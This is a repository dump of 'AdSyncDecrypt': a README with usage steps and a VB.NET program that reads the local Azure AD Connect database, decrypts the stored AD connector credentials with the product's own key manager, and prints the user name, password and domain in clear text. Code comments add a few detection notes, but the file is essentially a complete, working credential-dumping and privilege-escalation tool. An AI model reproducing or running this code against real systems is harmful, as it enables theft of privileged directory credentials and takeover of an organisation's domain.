├── README.md └── MainModule.vb /README.md: -------------------------------------------------------------------------------- 1 | # AdSyncDecrypt 2 | 3 | See here for explanation: https://vbscrub.com/2020/01/14/azure-ad-connect-database-exploit-priv-esc/ 4 | 5 | Note: This program must be run while the AD Sync Bin folder is your “working directory”, or has been added to the PATH variable. An easy way to do this is simply navigate to the folder in Powershell or Command Prompt (i.e cd “C:\Program Files\Microsoft Azure AD Sync\Bin”), and then run the program by typing the full path to wherever you have stored it. You also need to make sure the mcrypt.dll (icluded in the ZIP file you download from the Release tab) is in the same directory the program is in. Failure to do either of these things will result in a Module Not Found error. 6 | -------------------------------------------------------------------------------- /MainModule.vb: --------------------------------------------------------------------------------
Imports Microsoft.DirectoryServices.MetadirectoryServices.Cryptography
Imports System.Data.SqlClient
Imports System.Xml

' MainModule: reads the Azure AD Connect ("ADSync") configuration database and
' uses the product's own cryptography assembly (the README names mcrypt.dll as
' the DLL that must be loadable) to decrypt the stored AD connector credentials,
' then prints them to the console.
'
' Defender notes, based only on what this file does:
'   * Everything it needs comes from two tables of the local ADSync database:
'     mms_server_configuration (key identifiers and entropy) and
'     mms_management_agent (the row with ma_type = 'AD'). Reads of those
'     tables by a process other than the sync service may be worth auditing.
'   * The decryption itself is done by KeyManager/Key from
'     Microsoft.DirectoryServices.MetadirectoryServices.Cryptography; that
'     assembly being loaded into an unexpected process is another signal.
'   * The decrypted password is written to stdout in clear text, so console
'     transcripts and logs of this program are sensitive in their own right.
Module MainModule

    ' Entry point. An optional first argument "-FullSql" (compared
    ' case-insensitively) selects a full SQL Server on localhost instead of
    ' the LocalDB instance. Every failure is only reported to the console:
    ' nothing is re-thrown and no exit code is set, so success and failure can
    ' only be told apart by reading the output.
    Sub Main()
        Try
            Console.WriteLine(Environment.NewLine & "======================" & Environment.NewLine &
                              "AZURE AD SYNC CREDENTIAL DECRYPTION TOOL" & Environment.NewLine &
                              "Based on original code from: https://github.com/fox-it/adconnectdump" & Environment.NewLine &
                              "======================" & Environment.NewLine)

            ' Default: the LocalDB instance named ADSync.
            Dim SqlConnectionString As String = "Data Source=(LocalDB)\\.\\ADSync;Initial Catalog=ADSync;Connect Timeout=20"

            ' "-FullSql": ADSync installed against a full SQL Server on this
            ' host, authenticated as the current Windows user.
            If My.Application.CommandLineArgs.Count > 0 AndAlso String.Compare(My.Application.CommandLineArgs(0), "-FullSql", True) = 0 Then
                SqlConnectionString = "Server=LocalHost;Database=ADSync;Trusted_Connection=True;"
            End If

            Dim KeyId As UInteger               ' keyset_id
            Dim InstanceId As Guid              ' instance_id
            Dim Entropy As Guid                 ' entropy
            Dim ConfigXml As String             ' private_configuration_xml (stored in clear)
            Dim EncryptedPasswordXml As String  ' encrypted_configuration (base64, encrypted)

            Using SqlConn As New SqlConnection(SqlConnectionString)
                Try
                    Console.WriteLine("Opening database connection...")
                    SqlConn.Open()
                    ' Key-set identifiers: exactly the three values that
                    ' KeyManager.LoadKeySet needs further down.
                    Using SqlCmd As New SqlCommand("SELECT instance_id, keyset_id, entropy FROM mms_server_configuration;", SqlConn)
                        Console.WriteLine("Executing SQL commands...")
                        Using Reader As SqlDataReader = SqlCmd.ExecuteReader
                            ' Read()'s result is not checked: an empty result
                            ' set surfaces as an exception from the column
                            ' indexer and is reported by the Catch below.
                            Reader.Read()
                            InstanceId = DirectCast(Reader("instance_id"), Guid)
                            KeyId = CUInt(Reader("keyset_id"))
                            Entropy = DirectCast(Reader("entropy"), Guid)
                        End Using
                    End Using
                    ' Only the first row with ma_type = 'AD' is used; any
                    ' further AD management agents are ignored.
                    Using SqlCmd As New SqlCommand("SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'", SqlConn)
                        Using Reader As SqlDataReader = SqlCmd.ExecuteReader
                            Reader.Read()
                            ConfigXml = CStr(Reader("private_configuration_xml"))
                            EncryptedPasswordXml = CStr(Reader("encrypted_configuration"))
                        End Using
                    End Using
                Catch Ex As Exception
                    ' Any database failure (connection, permissions, missing
                    ' rows) ends the program here; Finally and the enclosing
                    ' Using still run on the way out.
                    Console.WriteLine("Error reading from database: " & Ex.Message)
                    Exit Sub
                Finally
                    ' Redundant with the enclosing Using, which disposes (and
                    ' therefore closes) the connection as well.
                    Console.WriteLine("Closing database connection...")
                    SqlConn.Close()
                End Try
                Try
                    Console.WriteLine("Decrypting XML...")
                    ' Argument order is (entropy, instance, keyset), which is
                    ' not the column order of the SELECT above.
                    Dim CryptoManager As New KeyManager
                    CryptoManager.LoadKeySet(Entropy, InstanceId, KeyId)
                    ' Both calls hand their result back through the argument
                    ' (the variables are set to Nothing first and used after).
                    Dim Decryptor As Key = Nothing
                    CryptoManager.GetActiveCredentialKey(Decryptor)
                    Dim PlainTextPasswordXml As String = Nothing
                    Decryptor.DecryptBase64ToString(EncryptedPasswordXml, PlainTextPasswordXml)
                    Console.WriteLine("Parsing XML...")
                    Dim Domain As String = String.Empty
                    Dim Username As String = String.Empty
                    Dim Password As String = String.Empty
                    Dim XmlDoc As New XmlDocument
                    ' Password: the first <attribute> element anywhere in the
                    ' decrypted document.
                    XmlDoc.LoadXml(PlainTextPasswordXml)
                    Dim XmlNav As XPath.XPathNavigator = XmlDoc.CreateNavigator
                    Password = XmlNav.SelectSingleNode("//attribute").Value
                    ' Domain and user name come from the clear-text private
                    ' configuration XML. SelectSingleNode returns Nothing when
                    ' there is no match, so a missing element shows up as a
                    ' NullReferenceException in the Catch below.
                    XmlDoc.LoadXml(ConfigXml)
                    XmlNav = XmlDoc.CreateNavigator
                    Domain = XmlNav.SelectSingleNode("//parameter[@name='forest-login-domain']").Value
                    Username = XmlNav.SelectSingleNode("//parameter[@name='forest-login-user']").Value
                    ' The clear-text credentials go to stdout.
                    Console.WriteLine("Finished!" &
                                      Environment.NewLine & Environment.NewLine &
                                      "DECRYPTED CREDENTIALS:" & Environment.NewLine &
                                      "Username: " & Username & Environment.NewLine &
                                      "Password: " & Password & Environment.NewLine &
                                      "Domain: " & Domain & Environment.NewLine)
                Catch ex As Exception
                    ' Covers key loading, decryption and XML parsing failures
                    ' alike; the message does not say which step failed.
                    Console.WriteLine("Error decrypting: " & ex.Message)
                End Try
            End Using
        Catch ex As Exception
            ' Last resort for anything outside the two inner handlers
            ' (e.g. constructing the SqlConnection itself).
            Console.WriteLine("Unexpected error: " & ex.Message)
        End Try
    End Sub

End Module
--------------------------------------------------------------------------------